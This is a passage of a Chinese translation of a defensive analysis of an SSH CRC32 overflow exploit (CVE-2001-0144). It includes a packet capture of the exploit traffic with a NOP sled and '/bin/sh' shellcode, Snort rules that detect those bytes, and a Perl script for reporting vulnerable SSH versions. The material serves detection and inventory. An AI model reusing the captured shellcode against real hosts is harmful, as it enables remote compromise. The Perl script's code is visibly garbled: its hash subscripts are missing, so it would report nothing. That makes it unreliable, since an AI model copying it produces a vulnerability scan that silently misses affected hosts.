此时SHELLCODE的后门程序已经执行,这样你可以连接端口进行任何操作。唯一的

问题是,SSH守护程序(至少SSH.com 1.2.31)会由于认证过程不完整而超时,导致

关闭开启的SHELL。一般在监听shell的父进程关闭只前会有10分钟时间空域。

网络通信信息分析

=====================

在这里使用了Tcpdump来截获上面的攻击行为,记录信息在sshdx.dump,可以被用

来IDS入侵检测系统获得攻击标志信息。假如你的IDS系统不支持tcpdump文件,你

可以使用"tcpreplay"[12]来转换tcpdump信息。

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# tcpdump -s1500 -w sshdx.dump ip host 10.10.10.3 &

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

这样可以很轻易的查看SSH守护程序产生的多个连接信息,使用"ngrep"[5]工具可以

辨认出最后连接和插入SHELLCODE的暴力破解攻击信息:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

. . .

T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]

SSH-1.5-1.2.31.

T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]

SSH-1.5-OpenSSH_2.2.0p1.

T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]

............GA..@.......%....`..P.....D&..2.+7#...1!?..c.r).8.^.h.....

..I..b6..9.f........N..0....:BAh@s.e...H......(.D2.Zg......#.......\.j

W...O$....6.......$...V..;...U.@Y.K2.p<\..o..?..l.........*.p.K<s..,..

.@7.wBBy......1.i..%".....G*g.G.t(......M........[.......J......<.

T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]

............GA..@.....`G.Fg.g.!.i.}..........._.e....=../..6....;....)

T.....|c...#W.\wve.cy .n.....q.Sc....}..".N.G.w"....n.../#.....8x..&.Z

....Q/.......8..

T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]

.........4..

T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]

..W...2.......2.......2.......2.......2.......2.......2.......2.......

2.......2.......2.......2.......2.......2.......2.......2.......2 ....

..2!......2$......2%......2(......2)......2,......2-......20......21..

....24......25......28......29......2<......2=......2@......2A......2D

......2E......2H......2I......2L......2M......2P......2Q......2T......

2U......2X......2Y......2\......2]......2`......2a......2d......2e....

..2h......2i......2l......2m......2p......2q......2t......2u......2x..

....2y......2|......2}......2.......2.......2.......2.......2.......2.

......2.......2.......2.......2.......2.......2.......2.......2.......

2.......2.......2.......2.......2.......2.......2.......2.......2.....

..2.......2.......2.......2.......2.......2.......2.......2.......2...

....2.......2.......2.......2.......2.......2.......2.......2.......2.

......2.......2.......2.......2.......2.......2.......2.......2.......

2.......2.......2.......2.......2.......2.......2.......2.......2.....

..2.......2.......2.......2.......2.......2.......3.......3.......3...

....3.......3.......3.......3.......3.......3.......3.......3.......3.

......3.......3.......3.......3.......3 ......3!......3$......3%......

3(......3)......3,......3-......30......31......34......35......38....

..39......3<......3=......3@......3A......3D......3E......3H......3I..

....3L......3M......3P......3Q......3T......3U......3X......3Y......3\

......3]......3`......3a......3d........1...p}.@

T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]

......3i......3l......3m......3p......3q......3t......3u......3x......

3y......3|......3}......3.......3.......3.......3.......3.......3.....

..3.......3.......3.......3.......3.......3.......3.......3.......3...

....3.......3.......3.......3.......3.......3.......3.......3.......3.

......3.......3.......3.......3.......3.......3.......3.......3.......

3.......3.......3.......3.......3.......3.......3.......3.......3.....

..3.......3.......3.......3.......3.......3.......3.......3.......3...

....3.......3.......3.......3.......3.......3.......3.......3.......3.

......3.......3.......3.......3.......3.......4.......4.......4.......

4.......4.......4.......4.......4.......4.......4.......4.......4.....

..4.......4.......4.......4.......4 ......4!......4$......4%......4(..

....4)......4,......4-......40......41......44......45......48......49

......4<......4=......4@......4A......4D......4E......4H......4I......

4L......4M......4P......4Q......4T......4U......4X......4Y......4\....

..4]......4`......4a......4d......4e......4h......4i......4l......4m..

....4p......4q......4t......4u......4x......4y......4|......4}......4.

......4.......4.......4.......4.......4.......4.......4.......4.......

4.......4.......4.......4.......4.......4.......4.......4.......4.....

..4.......4.......4.......4.......4.......4.......4.......4.......4...

....4.......4.......4.......4.......4.......4.......4.......4.......4.

......4.......4.......4.......4.........1...p}.@

. . .

T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

.....................1..f..1...C.].C.].K.M..M...1..E.Cf.].f.E.09.M..E.

.E..E.....M.....CC....C....1..?......A....^.u.1..F..E......M..U.......

./bin/sh.h0h0h0, 7350, zip/TESO!......................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

........................................1...p}.@

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

这样针对这个攻击程序你可以匹配如下字符串"h0h0h0, 7350, zip/TESO!" [7] 和NOP等。

下面的特征字符串由Marty Roesch 和 Brian Caswell开发并可使用在Snort v1.8 或者

更高的版本[6]:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \

 (msg:"EXPLOIT ssh CRC32 overflow /bin/sh"; \

 flags:A+; content:"/bin/sh"; \

 reference:bugtraq,2347; reference:cve,CVE-2001-0144; \

 classtype:shellcode-detect;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \

 (msg:"EXPLOIT ssh CRC32 overflow filler"; \

 flags:A+; content:"|00 00 00 00 00 00 00 00 00 00 00 00 00|"; \

 reference:bugtraq,2347; reference:cve,CVE-2001-0144; \

 classtype:shellcode-detect;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \

 (msg:"EXPLOIT ssh CRC32 overflow NOOP"; \

 flags:A+; content:"|90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90|"; \

 reference:bugtraq,2347; reference:cve,CVE-2001-0144; \

 classtype:shellcode-detect;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \

 (msg:"EXPLOIT ssh CRC32 overflow"; \

 flags:A+; content:"|00 01 57 00 00 00 18|"; offset:0; depth:7; \

 content:"|FF FF FF FF 00 00|"; offset:8; depth:14; \

 reference:bugtraq,2347; reference:cve,CVE-2001-0144; \

 classtype:shellcode-detect;)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

鉴别你的主机是否存在此漏洞

===========================

你可以使用Jeremy Mates' scan_ssh.pl[8] 和 Niels Provos' ScanSSH scanner[9]

写的脚本来鉴别SSH服务和它们的版本。

Russell Fulton 也公布了一个脚本程序Argus[10]用来处理日志,包含在下面的附录中。

----------------------------------------------------------------------------

参考

========

[1] Portable Linux Amazing CD (PLAC) v2.9.1pre2, by Fred Cohen

 http://www.all.net/ForensiX/plac.html

[2] Netcat, by der Hobbit

 http://www.l0pht.com/~weld/netcat/

[3] Reverse Engineer's Query Tool

 http://packetstormsecurity.org/linux/reverse-engineering/reqt-0.7f.tar.gz

[4] LiSt Open Files (lsof)

 http://sunsite.securitycentralhq.com/mirrors/security/lsof/lsof.tar.gz

[5] ngrep, by Jordan Ritter

 http://www.packetfactory.net/projects/ngrep/

[6] Snort

 http://www.snort.org/

[7] 7350.org / 7350

 http://www.7350.org/

 http://www.team-teso.org/about.php (see the bottom)

[8] Jeremy Mates 提供的ssh_scan.pl

 http://sial.org/code/perl/scripts/ssh_scan.pl.html

[9] Niels Provos提供的ScanSSH 扫描程序

 http://www.monkey.org/~provos/scanssh/

[10] Argus - 网络传输审核工具

 http://www.pl.freebsd.org/es/ports/net.html#argus-1.8.1

[11] tcpdump

 http://staff.washington.edu/dittrich/misc/sshdx.dump

[12] tcpreplay

 http://packages.debian.org/testing/net/tcpreplay.html

Appendix A

==========

两个扫描脚本如下

=-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#!/usr/bin/perl

#

# ssh-report

#

# Dave Dittrich <dittrich@cac.washington.edu>

# Thu Nov 8 21:39:20 PST 2001

#

# Process output of scans for SSH servers, with version identifying

# information, into two level break report format by SSH version.

#

# This script operates on a list of scan results that look

# like this:

#

# % cat scanresults

# 10.0.0.1 beavertail.dept.foo.edu SSH-1.5-1.2.31

# 10.0.0.2 lumpysoup.dept.foo.edu SSH-1.5-1.2.31

# 10.0.0.3 marktwain.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2

# 10.0.0.4 junebug.dept.foo.edu SSH-1.5-1.2.31

# 10.0.0.10 calvin.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2

# 10.0.0.11 hobbes.dept.foo.edu SSH-1.99-OpenSSH_2.1.1

# 10.0.0.20 willow.dept.foo.edu SSH-1.99-OpenSSH_2.9p2

# 10.0.0.21 berry.dept.foo.edu SSH-1.99-OpenSSH_2.9p2

# 10.0.0.23 whimpy.dept.foo.edu SSH-1.99-OpenSSH_2.9p2

#

# The resulting report (without the "-a" flag) will look like this:

#

# % ssh-report < scanresults

#

# SSH-1.5-1.2.31 (affected)

# beavertail.dept.foo.edu(10.0.0.1)

# lumpysoup.dept.foo.edu(10.0.0.2)

# junebug.dept.foo.edu(10.0.0.4)

#

#

# SSH-1.99-OpenSSH_2.1.1 (affected)

# hobbes.dept.foo.edu(10.0.0.11)

#

# By default, this script will only report on those systems that

# are running potentially vulnerable SSH servers. Use the "-a"

# option to report on all servers. Use "grep -v" to filter out

# hosts *before* you run them through this reporting script.

#

# SSH servers are considered "affected" if they are known, by being

# listed in one or more of the following references, to have the crc32

# compensation attack detector vulnerability:

#

# http://www.kb.cert.org/vuls/id/945216

# http://www.securityfocus.com/bid/2347/

# http://xforce.iss.net/alerts/advise100.php

# http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm

#

# You also may need to adjust the logic below to lump systems

# into the "Unknown" category correctly (e.g., if your server

# has a custom version string, Access control, etc.)

#

# The list below of servers and potential vulnerability was derived by

# summarizing existing versions on a set of production networks and

# using the advisories and reference material listed above. You

# should update this list as new information is oBTained, or if new

# versions of the SSH server are found on your network.

%affected = (

'Unknown', 'unknown',

'SSH-1.4-1.2.14', 'not affected',

'SSH-1.4-1.2.15', 'not affected',

'SSH-1.4-1.2.16', 'not affected',

'SSH-1.5-1.2.17', 'not affected',

'SSH-1.5-1.2.18', 'not affected',

'SSH-1.5-1.2.19', 'not affected',

'SSH-1.5-1.2.20', 'not affected',

'SSH-1.5-1.2.21', 'not affected',

'SSH-1.5-1.2.22', 'not affected',

'SSH-1.5-1.2.23', 'not affected',

'SSH-1.5-1.2.24', 'affected',

'SSH-1.5-1.2.25', 'affected',

'SSH-1.5-1.2.26', 'affected',

'SSH-1.5-1.2.27', 'affected',

'SSH-1.5-1.2.28', 'affected',

'SSH-1.5-1.2.29', 'affected',

'SSH-1.5-1.2.30', 'affected',

'SSH-1.5-1.2.31', 'affected',

'SSH-1.5-1.2.31a', 'not affected',

'SSH-1.5-1.2.32', 'not affected',

'SSH-1.5-1.3.7', 'not affected',

'SSH-1.5-Cisco-1.25', 'unknown',

'SSH-1.5-OSU_1.5alpha1', 'unknown',

'SSH-1.5-OpenSSH-1.2', 'affected',

'SSH-1.5-OpenSSH-1.2.1', 'affected',

'SSH-1.5-OpenSSH-1.2.2', 'affected',

'SSH-1.5-OpenSSH-1.2.3', 'affected',

'SSH-1.5-OpenSSH_2.5.1', 'not affected',

'SSH-1.5-OpenSSH_2.5.1p1', 'not affected',

'SSH-1.5-OpenSSH_2.9p1', 'not affected',

'SSH-1.5-OpenSSH_2.9p2', 'not affected',

'SSH-1.5-RemotelyAnywhere', 'not affected',

'SSH-1.99-2.0.11', 'affected w/Version 1 fallback',

'SSH-1.99-2.0.12', 'affected w/Version 1 fallback',

'SSH-1.99-2.0.13', 'affected w/Version 1 fallback',

'SSH-1.99-2.1.0.pl2', 'affected w/Version 1 fallback',

'SSH-1.99-2.1.0', 'affected w/Version 1 fallback',

'SSH-1.99-2.2.0', 'affected w/Version 1 fallback',

'SSH-1.99-2.3.0', 'affected w/Version 1 fallback',

'SSH-1.99-2.4.0', 'affected w/Version 1 fallback',

'SSH-1.99-3.0.0', 'affected w/Version 1 fallback',

'SSH-1.99-3.0.1', 'affected w/Version 1 fallback',

'SSH-1.99-OpenSSH-2.1', 'affected',

'SSH-1.99-OpenSSH_2.1.1', 'affected',

'SSH-1.99-OpenSSH_2.2.0', 'affected',

'SSH-1.99-OpenSSH_2.2.0p1', 'affected',

'SSH-1.99-OpenSSH_2.3.0', 'not affected',

'SSH-1.99-OpenSSH_2.3.0p1', 'not affected',

'SSH-1.99-OpenSSH_2.5.1', 'not affected',

'SSH-1.99-OpenSSH_2.5.1p1', 'not affected',

'SSH-1.99-OpenSSH_2.5.1p2', 'not affected',

'SSH-1.99-OpenSSH_2.5.2p2', 'not affected',

'SSH-1.99-OpenSSH_2.9.9p2', 'not affected',

'SSH-1.99-OpenSSH_2.9', 'not affected',

'SSH-1.99-OpenSSH_2.9p1', 'not affected',

'SSH-1.99-OpenSSH_2.9p2', 'not affected',

'SSH-1.99-OpenSSH_3.0p1', 'not affected',

'SSH-2.0-1.1.1', 'unknown',

'SSH-2.0-2.3.0', 'affected w/Version 1 fallback',

'SSH-2.0-2.4.0', 'affected w/Version 1 fallback',

'SSH-2.0-3.0.0', 'affected w/Version 1 fallback',

'SSH-2.0-3.0.1', 'affected w/Version 1 fallback',

'SSH-2.0-OpenSSH_2.5.1p1', 'not affected',

'SSH-2.0-OpenSSH_2.5.2p2', 'not affected',

'SSH-2.0-OpenSSH_2.9.9p2', 'not affected',

'SSH-2.0-OpenSSH_2.9p2', 'not affected',

);

# Make SURE you read the code first.

&IKnowWhatImDoing();

$all++, shift(@ARGV) if $ARGV[0] eq "-a";

while (<>) {

 chop;

 s/\s+/ /g;

 ($ip, $host, $version) = split(' ', $_);

 # Adjust this to identify other strings reported

 # by servers that have access restrictions, etc.

 # in place and do not show a specific version number.

 # They all fall under the category "Unknown" in this case.

 $version = "Unknown"

 if ($version eq "Couldn't" ||

 $version eq "Unknown" ||

 $version eq "You" ||

 $version eq "timeout");

 $server = $host;

}

foreach $i (sort keys %server) {

 ($version,$ip) = split(":", $i);

 next if ($affected eq "not affected" && ! $all);

 printf("\n\n%s (%s)\n", $version, $affected)

 if ($curver ne $version);

 $curver = $version;

 print " " . $server . "($ip)\n";

}

exit(0);

sub IKnowWhatImDoing {

 local $IKnowWhatImDoing = 0;

 # Uncomment the following line to make this script work.

 # $IKnowWhatImDoing++;

 die "I told you to read the code first, didn't I?\n"

 unless $IKnowWhatImDoing;

 return;

}

=-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有